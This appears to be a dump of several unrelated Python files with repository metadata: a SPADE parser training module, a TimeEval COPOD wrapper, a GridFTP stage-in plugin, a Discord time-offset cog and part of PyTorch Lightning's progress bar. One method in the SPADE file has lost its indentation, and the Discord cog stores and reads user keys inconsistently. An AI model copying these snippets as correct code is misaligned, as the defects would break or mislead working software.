            "label_units": results["label_units"],
            "pr_label_units": results["pr_label_units"],
            "parses": results["parses"],
            "pr_parses": results["pr_parses"],
        }
        # Accumulate tp/fp/fn into the torchmetrics state (reduced at epoch end).
        (tp_edge, fp_edge, fn_edge, tp_parse, fp_parse, fn_parse) = rtu.count_tp_fn_fp(
            self.task,
            results["label_units"],
            results["pr_label_units"],
            "validation",
            results["parses"],
            results["pr_parses"],
            self.parse_refine_options,
        )
        self.spade_metric.update(
            tp_edge, fp_edge, fn_edge, tp_parse, fp_parse, fn_parse
        )
        return val_out
    def validation_epoch_end(self, outputs):
        """Reduce validation metrics, track the best score, and checkpoint.

        Saves a "best" checkpoint whenever the configured validation metric
        improves, plus periodic checkpoints every ``save_epoch_interval`` epochs.
        """
        # 1. Reduce validation results
        (
            precision_edge_avg,
            recall_edge_avg,
            f1_edge_avg,
            precision_parse,
            recall_parse,
            f1_parse,
        ) = self.spade_metric.compute()
        self.spade_metric.reset()
        if gu.get_local_rank() == 0:
            (label_units, parses) = rtu.collect_outputs_gt(self.task, outputs)
            (_, pr_parses) = rtu.collect_outputs_pr(self.task, outputs)
            # 2. Compute validation score
            losses = [x["loss"] for x in outputs]
            avg_loss = torch.mean(torch.stack(losses))
            validation_score_dict = rtu.generate_score_dict(
                "validation",
                avg_loss,
                precision_edge_avg,
                recall_edge_avg,
                f1_edge_avg,
                f1_parse,
            )
            validation_score = validation_score_dict[
                f"validation__{self.tparam.validation_metric}"
            ]
            print(f"Val. metric: {self.tparam.validation_metric}")
            print(
                f"Val. top score: {self.validation_top_score}, current val. score: {validation_score}"
            )
            print(f"Epoch: {self.current_epoch}, validation score_dict")
            pprint(validation_score_dict)
            # 3. Update best validation score
            if self.validation_top_score is None:
                self.validation_top_score = validation_score
            if self.validation_top_score < validation_score:
                print(
                    f"Best score = {validation_score} from epoch {self.current_epoch}"
                )
                self.validation_top_score = validation_score
                path_save_model = Path(self.tparam.path_save_model_dir) / "best"
                os.makedirs(path_save_model, exist_ok=True)
                gu.save_pytorch_model(path_save_model, self)
            # Periodic checkpointing, independent of the best-score logic.
            if (
                self.current_epoch % self.tparam.save_epoch_interval == 0
                and self.current_epoch > 0
            ):
                path_save_model = (
                    Path(self.tparam.path_save_model_dir) / str(self.current_epoch)
                )
                os.makedirs(path_save_model, exist_ok=True)
                gu.save_pytorch_model(path_save_model, self)
            if self.verbose:
                if self.current_epoch != 0:
                    print(f"Validation result at epoch {self.current_epoch}")
                    print(f"{validation_score_dict}")
                    rtu.print_parsing_result(parses, pr_parses)
    def configure_optimizers(self):
        """Build the optimizer and LR scheduler dict from training parameters."""
        optimizer = get_optimizer(self.tparam, self)
        lr_dict = get_lr_dict(optimizer, self.tparam)
        return {"optimizer": optimizer, "lr_scheduler": lr_dict}
    def test_step(self, batch, batch_idx, dataset_idx):
        """Lightning test step over multiple test dataloaders.

        When the batch has no labels (raw OCR parsing), the loss is set to -1
        as a sentinel instead of being computed.
        """
        results = self._run("test", batch)
        if results["label_units"][0] is None:  # parse ocr results
            loss = -1
        else:
            loss = Loss_rt(
                results["score"],
                results["label_units"],
                self.n_fields,
                results["l_units"],
                self.cross_entropy_loss_weight,
            )
        test_out = {
            "dataset_idx": dataset_idx,
            "loss": loss,
            "data_ids": results["data_ids"],
            "label_units": results["label_units"],
            "pr_label_units": results["pr_label_units"],
            "parses": results["parses"],
            "pr_parses": results["pr_parses"],
            "text_unit_field_labels": results["text_unit_field_labels"],
            "pr_text_unit_field_labels": results["pr_text_unit_field_labels"],
            "f_parse_box_ids": results["f_parse_box_ids"],
            "pr_f_parse_box_ids": results["pr_f_parse_box_ids"],
        }
        (tp_edge, fp_edge, fn_edge, tp_parse, fp_parse, fn_parse) = rtu.count_tp_fn_fp(
            self.task,
            results["label_units"],
            results["pr_label_units"],
            "test",
            results["parses"],
            results["pr_parses"],
            self.parse_refine_options,
        )
        self.spade_metric.update(
            tp_edge, fp_edge, fn_edge, tp_parse, fp_parse, fn_parse
        )
        return test_out
@rank_zero_only
def test_epoch_end(self, outputs: List[Any]) -> None:
if self.hparam.task == "receipt_v1":
self.test_epoch_end_receipt_v1(outputs)
elif self.hparam.task == "funsd":
self.test_epoch_end_funsd(outputs)
else:
raise NotImplementedError
    @rank_zero_only
    @gu.timeit
    def predict_step(self, batch, batch_idx, dataset_idx):
        """Run inference on a single-example batch and return its predicted parse."""
        results = self._run("test", batch)
        # This path only supports batch size 1.
        assert len(results["data_ids"]) == 1
        test_out = {
            "data_id": results["data_ids"][0],
            "text_unit": results["text_units"][0],
            "pr_parse": results["pr_parses"][0],
            "pr_label": results["pr_label_units"][0],
            "pr_text_unit_field_label": results["pr_text_unit_field_labels"][0],
        }
        return test_out
    def test_epoch_end_funsd(self, outputs):
        """Aggregate FUNSD test results and write analysis files.

        Computes dependency-edge P/R/F1, parse F1, entity-level (ELB) and
        link-level (ELK) F1, then saves everything under the analysis dir.
        """
        test_types = ["dev", "test"]
        for i, (test_type, outputs_each_dataloader) in enumerate(
            zip_longest(test_types, outputs)
        ):
            if i == 0:
                continue  # dev == test in funsd case.
            # 1. Collect required features from the outputs
            losses = [x["loss"] for x in outputs_each_dataloader]
            avg_loss = torch.mean(torch.stack(losses))
            (
                label_units,
                parses,
                text_unit_field_labels,
                f_parse_box_ids,
            ) = rtu.collect_outputs_gt(
                self.task, outputs_each_dataloader, return_aux=True
            )
            label_units = [x.cpu().numpy() for x in label_units]
            (
                pr_label_units,
                pr_parses,
                pr_text_unit_field_labels,
                pr_f_parse_box_ids,
            ) = rtu.collect_outputs_pr(
                self.task, outputs_each_dataloader, return_aux=True
            )
            # 2. Calculate score
            # 2.1 Calculate without the field header indicators.
            tp_edge, fn_edge, fp_edge = au.cal_tp_fn_fp_of_edges(
                label_units, pr_label_units
            )
            p_edge, r_edge, f1_edge = au.cal_p_r_f1(tp_edge, fn_edge, fp_edge)
            f1, parse_stat, card_stat, corrects_parse = rtu.cal_f1_scores(
                self.task, "test", parses, pr_parses, self.parse_refine_options
            )
            fields_of_interest = [
                "header.header",
                "qa.question",
                "qa.answer",
                "other.other",
            ]
            # 2.2 Calculate with the field header indicators.
            (
                header_id_of_entities,
                header_label_of_entities,
            ) = au.extract_header_id_of_entities(f_parse_box_ids)
            text_unit_field_label_subs = au.get_headers_of(
                header_id_of_entities, text_unit_field_labels
            )
            pr_text_unit_field_label_subs = au.get_headers_of(
                header_id_of_entities, pr_text_unit_field_labels
            )
            tp_fn_fp_all_entity = au.get_tp_fn_fp_all(
                text_unit_field_label_subs,
                pr_text_unit_field_label_subs,
                fields_of_interest,
            )
            # 2.2.1 Calculate F1 for ELB task.
            p_r_f1_entity, p_r_f1_all_entity = au.get_p_r_f1_entity(
                tp_fn_fp_all_entity, fields_of_interest
            )
            # 2.2.2 Calculate F1 for ELK task.
            gt_links = au.extract_links(self.fields, label_units, target_label_id=1)
            pr_links = au.extract_links(self.fields, pr_label_units, target_label_id=1)
            pr_links_filtered = au.filter_non_header_id(
                pr_links, header_id_of_entities, gt=False
            )
            p_r_f1_link = au.get_p_r_f1_link(gt_links, pr_links_filtered)
            test_score_dict = rtu.generate_score_dict(
                test_type, avg_loss, p_edge, r_edge, f1_edge, f1, is_tensor=False
            )
            test_score_dict.update(
                {
                    "p_r_f1_entity": p_r_f1_entity,
                    "p_r_f1_all_entity_ELB": p_r_f1_all_entity,  # ELB
                    "p_r_f1_link_ELK": p_r_f1_link,  # ELK
                }
            )
            # 3. Save analysis results
            path_analysis_dir = Path(self.hparam.path_analysis_dir)
            rtu.save_analysis_results(
                path_analysis_dir,
                test_type,
                test_score_dict,
                parse_stat,
                card_stat,
                corrects_parse,
                parses,
                pr_parses,
            )
    def test_epoch_end_receipt_v1(self, outputs):
        """Aggregate receipt-v1 results over four dataloaders.

        The first two dataloaders (dev, test) carry ground truth; the last two
        (ocr_dev, ocr_test) do not, so the gt parses collected from dev/test
        are reused (re-sorted by data id) to score the OCR variants.
        """
        test_types = ["dev", "test", "ocr_dev", "ocr_test"]
        parsess = []
        data_idss = []
        ave_losses = []
        for i, (test_type, outputs_each_dataloader) in enumerate(
            zip_longest(test_types, outputs)
        ):
            # 1. Collect required results from the outputs
            data_ids = rtu.gather_values_from_step_outputs(
                outputs_each_dataloader, "data_ids"
            )
            (pr_label_units, pr_parses) = rtu.collect_outputs_pr(
                self.task, outputs_each_dataloader
            )
            if i <= 1:
                # dev, test
                losses = [x["loss"] for x in outputs_each_dataloader]
                avg_loss = torch.mean(torch.stack(losses))
                ave_losses.append(avg_loss)
                (label_units, parses) = rtu.collect_outputs_gt(
                    self.task, outputs_each_dataloader
                )
                parsess.append(parses)
                data_idss.append(data_ids)
                tp_edge, fn_edge, fp_edge = au.cal_tp_fn_fp_of_edges(
                    label_units, pr_label_units
                )
                p_edge, r_edge, f1_edge = au.cal_p_r_f1(tp_edge, fn_edge, fp_edge)
            else:
                # ocr-dev, ocr-test
                # ocr-dev, ocr-test do not include ground-truth.
                # Thus, ground-truth from dev, test are used for the calculation.
                data_ids = [
                    int(x) for x in data_ids
                ]  # ocr-dev, -test data use string data_id.
                # i % 2 pairs ocr_dev with dev and ocr_test with test.
                avg_loss = ave_losses[i % 2]
                parses_unsorted = deepcopy(parsess[i % 2])
                data_ids_oracle = deepcopy(data_idss[i % 2])
                # sort parses
                _ii = [data_ids_oracle.index(id) for id in data_ids]
                parses = [parses_unsorted[i] for i in _ii]
                # Cannot calculate dependency parsing scores in ocr-dev, ocr-test
                p_edge, r_edge, f1_edge = [-1], [-1], [-1]
            # 2. Calculate scores
            f1, parse_stat, card_stat, corrects_parse = rtu.cal_f1_scores(
                self.task,
                "test",
                parses,
                pr_parses,
                self.parse_refine_options,
            )
            test_score_dict = rtu.generate_score_dict(
                test_type, avg_loss, p_edge, r_edge, f1_edge, f1, is_tensor=False
            )
            # 3. Save analysis results
            path_analysis_dir = Path(self.hparam.path_analysis_dir)
            rtu.save_analysis_results(
                path_analysis_dir,
                test_type,
                test_score_dict,
                parse_stat,
                card_stat,
                corrects_parse,
                parses,
                pr_parses,
            )
def gen_encoder_layer(hparam, path_data_folder):
    """Build the SPADE spatial-text encoder, optionally warm-starting it
    from a pretrained transformer backbone.

    Raises:
        NotImplementedError: for encoder types other than "spade".
    """
    # 1. Load pretrained transformer
    if hparam.encoder_backbone_is_pretrained:
        (
            pretrained_transformer,
            pretrained_transformer_cfg,
        ) = mu.get_pretrained_transformer(
            path_data_folder,
            hparam.encoder_backbone_name,
            hparam.encoder_backbone_tweak_tag,
        )
    # 2. Load model
    if hparam.encoder_type_name == "spade":
        # 2.1 Load encoder
        spatial_text_encoder = SpadeEncoder(hparam, path_data_folder)
        # 2.2 Initialize the subset of weights from the pretraiend transformer.
        if hparam.encoder_backbone_is_pretrained:
            print(f"pretrained {hparam.encoder_backbone_name} is used")
            mu.check_consistency_between_backbone_and_encoder(
                pretrained_transformer_cfg, spatial_text_encoder.transformer_cfg
            )
            pretrained_transformer_state_dict = pretrained_transformer.state_dict()
            # Copy only the weights whose names match into the child model.
            spatial_text_encoder = gu.update_part_of_model(
                parent_model_state_dict=pretrained_transformer_state_dict,
                child_model=spatial_text_encoder,
                rank=gu.get_local_rank(),
            )
    else:
        raise NotImplementedError
    return spatial_text_encoder
def gen_decoder_layer(hparam, encoder_transformer_cfg):
    """Build the SPADE graph decoder.

    The decoder consumes the concatenation of one hidden vector per selected
    encoder layer, so its input size scales with that layer count.

    Raises:
        NotImplementedError: for decoder types other than "spade".
    """
    n_layers_used = len(hparam.encoder_layer_ids_used_in_decoder)
    input_size = encoder_transformer_cfg.hidden_size * n_layers_used
    # 1. Load decoder
    if hparam.decoder_type != "spade":
        raise NotImplementedError
    return SpadeDecoder(
        input_size,
        hparam.decoder_hidden_size,
        hparam.n_relation_type,
        hparam.fields,
        hparam.token_lv_boxing,
        hparam.include_second_order_relations,
        hparam.vi_params,
    )
| 33.830402 | 102 | 0.559397 |
414df8272aa0e971411fcd39d6d671ed37a1c249 | 1,081 | py | Python | timeeval_experiments/algorithms/copod.py | HPI-Information-Systems/TimeEval | 9b2717b89decd57dd09e04ad94c120f13132d7b8 | [
"MIT"
] | 2 | 2022-01-29T03:46:31.000Z | 2022-02-14T14:06:35.000Z | timeeval_experiments/algorithms/copod.py | HPI-Information-Systems/TimeEval | 9b2717b89decd57dd09e04ad94c120f13132d7b8 | [
"MIT"
] | null | null | null | timeeval_experiments/algorithms/copod.py | HPI-Information-Systems/TimeEval | 9b2717b89decd57dd09e04ad94c120f13132d7b8 | [
"MIT"
] | null | null | null | from durations import Duration
from typing import Any, Dict, Optional
from timeeval import Algorithm, TrainingType, InputDimensionality
from timeeval.adapters import DockerAdapter
from timeeval.params import ParameterConfig
_copod_parameters: Dict[str, Dict[str, Any]] = {
"random_state": {
"defaultValue": 42,
"description": "Seed for random number generation.",
"name": "random_state",
"type": "int"
}
}
def copod(params: Optional[ParameterConfig] = None, skip_pull: bool = False, timeout: Optional[Duration] = None) -> Algorithm:
    """Build the timeeval ``Algorithm`` descriptor for the COPOD detector.

    Args:
        params: parameter configuration; falls back to the schema defaults when None.
        skip_pull: skip pulling the Docker image if it is already present.
        timeout: maximum wall-clock duration for a run (None = no limit).

    Returns:
        An unsupervised, multivariate ``Algorithm`` that runs COPOD via Docker.
    """
    return Algorithm(
        name="COPOD",
        main=DockerAdapter(
            image_name="registry.gitlab.hpi.de/akita/i/copod",
            skip_pull=skip_pull,
            timeout=timeout,
            group_privileges="akita",
        ),
        preprocess=None,
        postprocess=None,
        param_schema=_copod_parameters,
        param_config=params or ParameterConfig.defaults(),
        data_as_file=True,
        training_type=TrainingType.UNSUPERVISED,
        input_dimensionality=InputDimensionality("multivariate")
    )
95342621a4967fee382fc6b28b1f42371faebe5a | 71 | py | Python | 0-buggy.py | kmirik999/Kryvoruchko-Myroslav | 9f4a7fbe333e1ca3750e89e1f206aa9d9ca12145 | [
"MIT"
] | null | null | null | 0-buggy.py | kmirik999/Kryvoruchko-Myroslav | 9f4a7fbe333e1ca3750e89e1f206aa9d9ca12145 | [
"MIT"
] | null | null | null | 0-buggy.py | kmirik999/Kryvoruchko-Myroslav | 9f4a7fbe333e1ca3750e89e1f206aa9d9ca12145 | [
"MIT"
] | null | null | null | first_num = 2
second_num = 3
sum = first_num + second_num
print(sum)
| 10.142857 | 28 | 0.71831 |
7a722b4aa70feab0406b8983660da8c287d0a869 | 87 | py | Python | plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/asset_vulnerability_solution/__init__.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 46 | 2019-06-05T20:47:58.000Z | 2022-03-29T10:18:01.000Z | plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/asset_vulnerability_solution/__init__.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 386 | 2019-06-07T20:20:39.000Z | 2022-03-30T17:35:01.000Z | plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/asset_vulnerability_solution/__init__.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 43 | 2019-07-09T14:13:58.000Z | 2022-03-28T12:04:46.000Z | # GENERATED BY KOMAND SDK - DO NOT EDIT
from .action import AssetVulnerabilitySolution
| 29 | 46 | 0.816092 |
08d7eaa378008e9dd07269e8c249116bcf4b20dc | 5,961 | py | Python | pandaharvester/harvesterpreparator/gridftp_preparator.py | tsulaiav/harvester | ca3f78348019dd616738f2da7d50e81700a8e6b9 | [
"Apache-2.0"
] | 7 | 2019-08-30T07:35:48.000Z | 2022-02-13T14:46:53.000Z | pandaharvester/harvesterpreparator/gridftp_preparator.py | tsulaiav/harvester | ca3f78348019dd616738f2da7d50e81700a8e6b9 | [
"Apache-2.0"
] | 29 | 2019-09-20T14:04:37.000Z | 2021-09-13T12:53:05.000Z | pandaharvester/harvesterpreparator/gridftp_preparator.py | tsulaiav/harvester | ca3f78348019dd616738f2da7d50e81700a8e6b9 | [
"Apache-2.0"
] | 15 | 2019-07-30T11:48:29.000Z | 2022-03-29T21:49:05.000Z | import os
import tempfile
try:
import subprocess32 as subprocess
except Exception:
import subprocess
from pandaharvester.harvestercore.plugin_base import PluginBase
from pandaharvester.harvestercore import core_utils
from pandaharvester.harvestermover import mover_utils
# logger
baseLogger = core_utils.setup_logger('gridftp_preparator')
# preparator plugin with GridFTP
"""
-- Example of plugin config
"preparator": {
"name": "GridFtpPreparator",
"module": "pandaharvester.harvesterpreparator.gridftp_preparator",
# base path for source GridFTP server
"srcBasePath": "gsiftp://dcdum02.aglt2.org/pnfs/aglt2.org/atlasdatadisk/rucio/",
# base path for destination GridFTP server
"dstBasePath": "gsiftp://dcgftp.usatlas.bnl.gov:2811/pnfs/usatlas.bnl.gov/atlasscratchdisk/rucio/",
# base path for local access to the copied files
"localBasePath": "/data/rucio",
# max number of attempts
"maxAttempts": 3,
# check paths under localBasePath. Choose false if destination on remote node
"checkLocalPath": true,
# options for globus-url-copy
"gulOpts": "-cred /tmp/x509_u1234 -sync -sync-level 3 -verify-checksum -v"
}
"""
class GridFtpPreparator(PluginBase):
    """Stage-in preparator that copies job input files with ``globus-url-copy``.

    Builds one ``src dst`` transfer list covering every input file that is not
    already present locally (verified by adler32 checksum), then runs a single
    globus-url-copy process over that list.
    """
    # constructor
    def __init__(self, **kwarg):
        # defaults; PluginBase.__init__ may override them from the plugin config
        self.gulOpts = None          # extra command-line options for globus-url-copy
        self.maxAttempts = 3         # per-file attempt limit before giving up
        self.timeout = None          # seconds to wait for the transfer (None = forever)
        self.checkLocalPath = True   # skip inputs already present under localBasePath
        PluginBase.__init__(self, **kwarg)
    # trigger preparation
    def trigger_preparation(self, jobspec):
        """Start (synchronously) the stage-in transfers for ``jobspec``.

        Returns:
            (True, '') on success or nothing to do; (None, msg) on a retryable
            failure; (False, msg) once any file exceeded ``maxAttempts``.
        """
        # make logger
        tmpLog = self.make_logger(baseLogger, 'PandaID={0}'.format(jobspec.PandaID),
                                  method_name='trigger_preparation')
        tmpLog.debug('start')
        # loop over all inputs
        inFileInfo = jobspec.get_input_file_attributes()
        gucInput = None
        for tmpFileSpec in jobspec.inFiles:
            # construct source and destination paths
            srcPath = mover_utils.construct_file_path(self.srcBasePath, inFileInfo[tmpFileSpec.lfn]['scope'],
                                                      tmpFileSpec.lfn)
            dstPath = mover_utils.construct_file_path(self.dstBasePath, inFileInfo[tmpFileSpec.lfn]['scope'],
                                                      tmpFileSpec.lfn)
            # local access path
            accPath = mover_utils.construct_file_path(self.localBasePath, inFileInfo[tmpFileSpec.lfn]['scope'],
                                                      tmpFileSpec.lfn)
            if self.checkLocalPath:
                # check if already exits
                if os.path.exists(accPath):
                    # calculate checksum
                    checksum = core_utils.calc_adler32(accPath)
                    checksum = 'ad:{0}'.format(checksum)
                    # skip this file when the local copy already matches
                    if checksum == inFileInfo[tmpFileSpec.lfn]['checksum']:
                        continue
                # make directories if needed
                if not os.path.isdir(os.path.dirname(accPath)):
                    os.makedirs(os.path.dirname(accPath))
            # make input for globus-url-copy
            if gucInput is None:
                # delete=False: the file must outlive this handle for the subprocess
                gucInput = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='_guc_in.tmp')
            gucInput.write("{0} {1}\n".format(srcPath, dstPath))
            tmpFileSpec.attemptNr += 1
        # nothing to transfer
        if gucInput is None:
            tmpLog.debug('done with no transfers')
            return True, ''
        # transfer
        tmpLog.debug('execute globus-url-copy')
        gucInput.close()
        args = ['globus-url-copy', '-f', gucInput.name, '-cd']
        if self.gulOpts is not None:
            args += self.gulOpts.split()
        try:
            tmpLog.debug('execute: ' + ' '.join(args))
            p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            try:
                stdout, stderr = p.communicate(timeout=self.timeout)
            except subprocess.TimeoutExpired:
                # kill the transfer and collect whatever output it produced
                p.kill()
                stdout, stderr = p.communicate()
                tmpLog.warning('command timeout')
            return_code = p.returncode
            # flatten the outputs to single-line strings for logging
            if stdout is not None:
                if not isinstance(stdout, str):
                    stdout = stdout.decode()
                stdout = stdout.replace('\n', ' ')
            if stderr is not None:
                if not isinstance(stderr, str):
                    stderr = stderr.decode()
                stderr = stderr.replace('\n', ' ')
            tmpLog.debug("stdout: %s" % stdout)
            tmpLog.debug("stderr: %s" % stderr)
        except Exception:
            core_utils.dump_error_message(tmpLog)
            return_code = 1
        # the temporary transfer list is no longer needed
        os.remove(gucInput.name)
        if return_code == 0:
            tmpLog.debug('succeeded')
            return True, ''
        else:
            errMsg = 'failed with {0}'.format(return_code)
            tmpLog.error(errMsg)
            # check attemptNr
            for tmpFileSpec in jobspec.inFiles:
                if tmpFileSpec.attemptNr >= self.maxAttempts:
                    errMsg = 'gave up due to max attempts'
                    tmpLog.error(errMsg)
                    return (False, errMsg)
            # None signals a retryable failure to the harvester core
            return None, errMsg
    # check status
    def check_stage_in_status(self, jobspec):
        """Transfers are synchronous, so stage-in is always complete here."""
        return True, ''
    # resolve input file paths
    def resolve_input_paths(self, jobspec):
        """Record the local access path of every input file on the job spec."""
        # input files
        inFileInfo = jobspec.get_input_file_attributes()
        pathInfo = dict()
        for tmpFileSpec in jobspec.inFiles:
            accPath = mover_utils.construct_file_path(self.localBasePath, inFileInfo[tmpFileSpec.lfn]['scope'],
                                                      tmpFileSpec.lfn)
            pathInfo[tmpFileSpec.lfn] = {'path': accPath}
        jobspec.set_input_file_paths(pathInfo)
        return True, ''
137812f465aa6e828ae8094a850f4128269a000c | 2,595 | py | Python | Scripts/Cogs/time_commands.py | Mahas1/BotMan.py-rewritten | 77583eba29e3144798f98886b7fd3f1ad30b27c1 | [
"MIT"
] | null | null | null | Scripts/Cogs/time_commands.py | Mahas1/BotMan.py-rewritten | 77583eba29e3144798f98886b7fd3f1ad30b27c1 | [
"MIT"
] | null | null | null | Scripts/Cogs/time_commands.py | Mahas1/BotMan.py-rewritten | 77583eba29e3144798f98886b7fd3f1ad30b27c1 | [
"MIT"
] | null | null | null | import re
import discord
from discord.ext import commands
import os
import json
from assets import time_custom
class Time(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='time',
description='Gets the time of the user. if user does not have a timezone set, '
'they can use an offset like "+2:30"')
async def get_time(self, ctx, user: discord.Member = None):
if user is None:
user = ctx.author
user_id = str(user.id)
if not os.path.exists('./storage/time.json'): # create file if not exists
with open('./storage/time.json', 'w') as jsonFile:
print('./storage/time.json has been created')
json.dump({}, jsonFile)
with open('./storage/time.json', 'r') as timeFile:
time_data = json.load(timeFile)
user_offset = time_data.get(user_id)
if user_offset is None:
return await ctx.send(
f'_{user.display_name}_ has not set their offset. They can do so using the `setoffset` command.')
"""None of the following code is executed if user_offset is None"""
final_time_string = time_custom.time_bm(user_offset)
await ctx.send(final_time_string)
@commands.command(name='setoffset', description='Sets the user\'s time offset.\n'
'Format for offset: `-2:30`, `+2:30`, or just `2:30`\n'
'**Nerd note**: the regex for the offset is '
r'`^[+\-]?\d+:\d+$`')
async def set_offset(self, ctx, offset):
pattern = r'^[+\-]?\d+:\d+$'
if not re.match(pattern, offset): # matches the pattern, and if it fails, returns an error message
return await ctx.send('Improper offset format. Please read the help command for more info.')
if not os.path.exists('./storage/time.json'): # create file if not exists
with open('./storage/time.json', 'w') as jsonFile:
print('./storage/time.json has been created')
json.dump({}, jsonFile)
with open('./storage/time.json', 'r') as timeFile:
time_data = json.load(timeFile)
time_data[ctx.author.id] = offset
with open('./storage/time.json', 'w') as timeFile:
json.dump(time_data, timeFile)
await ctx.send(f'Time offset set as {offset} successfully.')
def setup(bot):
    """Extension entry point used by discord.py to register this cog."""
    cog = Time(bot)
    bot.add_cog(cog)
| 36.041667 | 113 | 0.565703 |
813cecd92cd7f6b512d5791f5423a5829db2b697 | 15,296 | py | Python | pytorch_lightning/callbacks/progress/tqdm_progress.py | FeryET/pytorch-lightning | b1f8b111b5085373599758a4e155a482259cdbf0 | [
"Apache-2.0"
] | null | null | null | pytorch_lightning/callbacks/progress/tqdm_progress.py | FeryET/pytorch-lightning | b1f8b111b5085373599758a4e155a482259cdbf0 | [
"Apache-2.0"
] | 1 | 2022-03-18T21:56:53.000Z | 2022-03-18T21:56:53.000Z | pytorch_lightning/callbacks/progress/tqdm_progress.py | FeryET/pytorch-lightning | b1f8b111b5085373599758a4e155a482259cdbf0 | [
"Apache-2.0"
] | null | null | null | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
import math
import os
import sys
from typing import Any, Dict, Optional, Union
# check if ipywidgets is installed before importing tqdm.auto
# to ensure it won't fail and a progress bar is displayed
if importlib.util.find_spec("ipywidgets") is not None:
from tqdm.auto import tqdm as _tqdm
else:
from tqdm import tqdm as _tqdm
import pytorch_lightning as pl
from pytorch_lightning.callbacks.progress.base import ProgressBarBase
from pytorch_lightning.utilities.rank_zero import rank_zero_debug
_PAD_SIZE = 5
class Tqdm(_tqdm):
    def __init__(self, *args: Any, **kwargs: Any) -> None:
        """tqdm variant whose formatted numbers are zero-padded to a fixed width.

        Padding floats/strings out to ``_PAD_SIZE`` characters keeps the bar
        width stable between refreshes, which prevents flickering.
        """
        super().__init__(*args, **kwargs)

    @staticmethod
    def format_num(n: Union[int, float, str]) -> str:
        """Format ``n`` like tqdm does, then right-pad floats/strings with zeros."""
        pad_candidate = isinstance(n, (float, str))
        if not isinstance(n, str):
            n = _tqdm.format_num(n)
        assert isinstance(n, str)
        # ints and scientific notation are left untouched
        if not pad_candidate or "e" in n:
            return n
        if "." not in n and len(n) < _PAD_SIZE:
            try:
                float(n)
            except ValueError:
                # non-numeric strings are returned as-is
                return n
            n += "."
        return n + "0" * (_PAD_SIZE - len(n))
class TQDMProgressBar(ProgressBarBase):
    r"""
    This is the default progress bar used by Lightning. It prints to ``stdout`` using the
    :mod:`tqdm` package and shows up to four different bars:
    - **sanity check progress:** the progress during the sanity check run
    - **main progress:** shows training + validation progress combined. It also accounts for
      multiple validation runs during training when
      :paramref:`~pytorch_lightning.trainer.trainer.Trainer.val_check_interval` is used.
    - **validation progress:** only visible during validation;
      shows total progress over all validation datasets.
    - **test progress:** only active when testing; shows total progress over all test datasets.
    For infinite datasets, the progress bar never ends.
    If you want to customize the default ``tqdm`` progress bars used by Lightning, you can override
    specific methods of the callback class and pass your custom implementation to the
    :class:`~pytorch_lightning.trainer.trainer.Trainer`.
    Example:
        >>> class LitProgressBar(TQDMProgressBar):
        ...     def init_validation_tqdm(self):
        ...         bar = super().init_validation_tqdm()
        ...         bar.set_description('running validation ...')
        ...         return bar
        ...
        >>> bar = LitProgressBar()
        >>> from pytorch_lightning import Trainer
        >>> trainer = Trainer(callbacks=[bar])
    Args:
        refresh_rate: Determines at which rate (in number of batches) the progress bars get updated.
            Set it to ``0`` to disable the display. By default, the :class:`~pytorch_lightning.trainer.trainer.Trainer`
            uses this implementation of the progress bar and sets the refresh rate to the value provided to the
            :paramref:`~pytorch_lightning.trainer.trainer.Trainer.progress_bar_refresh_rate` argument in the
            :class:`~pytorch_lightning.trainer.trainer.Trainer`.
        process_position: Set this to a value greater than ``0`` to offset the progress bars by this many lines.
            This is useful when you have progress bars defined elsewhere and want to show all of them
            together. This corresponds to
            :paramref:`~pytorch_lightning.trainer.trainer.Trainer.process_position` in the
            :class:`~pytorch_lightning.trainer.trainer.Trainer`.
    """
    def __init__(self, refresh_rate: int = 1, process_position: int = 0):
        super().__init__()
        self._refresh_rate = self._resolve_refresh_rate(refresh_rate)
        self._process_position = process_position
        self._enabled = True
        # bars are created lazily by the on_*_start hooks below
        self._main_progress_bar: Optional[_tqdm] = None
        self._val_progress_bar: Optional[_tqdm] = None
        self._test_progress_bar: Optional[_tqdm] = None
        self._predict_progress_bar: Optional[_tqdm] = None
    def __getstate__(self) -> Dict:
        # can't pickle the tqdm objects
        return {k: v if not isinstance(v, _tqdm) else None for k, v in vars(self).items()}
    @property
    def main_progress_bar(self) -> _tqdm:
        # raising (rather than returning None) surfaces hook-ordering bugs early
        if self._main_progress_bar is None:
            raise TypeError(f"The `{self.__class__.__name__}._main_progress_bar` reference has not been set yet.")
        return self._main_progress_bar
    @main_progress_bar.setter
    def main_progress_bar(self, bar: _tqdm) -> None:
        self._main_progress_bar = bar
    @property
    def val_progress_bar(self) -> _tqdm:
        if self._val_progress_bar is None:
            raise TypeError(f"The `{self.__class__.__name__}._val_progress_bar` reference has not been set yet.")
        return self._val_progress_bar
    @val_progress_bar.setter
    def val_progress_bar(self, bar: _tqdm) -> None:
        self._val_progress_bar = bar
    @property
    def test_progress_bar(self) -> _tqdm:
        if self._test_progress_bar is None:
            raise TypeError(f"The `{self.__class__.__name__}._test_progress_bar` reference has not been set yet.")
        return self._test_progress_bar
    @test_progress_bar.setter
    def test_progress_bar(self, bar: _tqdm) -> None:
        self._test_progress_bar = bar
    @property
    def predict_progress_bar(self) -> _tqdm:
        if self._predict_progress_bar is None:
            raise TypeError(f"The `{self.__class__.__name__}._predict_progress_bar` reference has not been set yet.")
        return self._predict_progress_bar
    @predict_progress_bar.setter
    def predict_progress_bar(self, bar: _tqdm) -> None:
        self._predict_progress_bar = bar
    @property
    def refresh_rate(self) -> int:
        return self._refresh_rate
    @property
    def process_position(self) -> int:
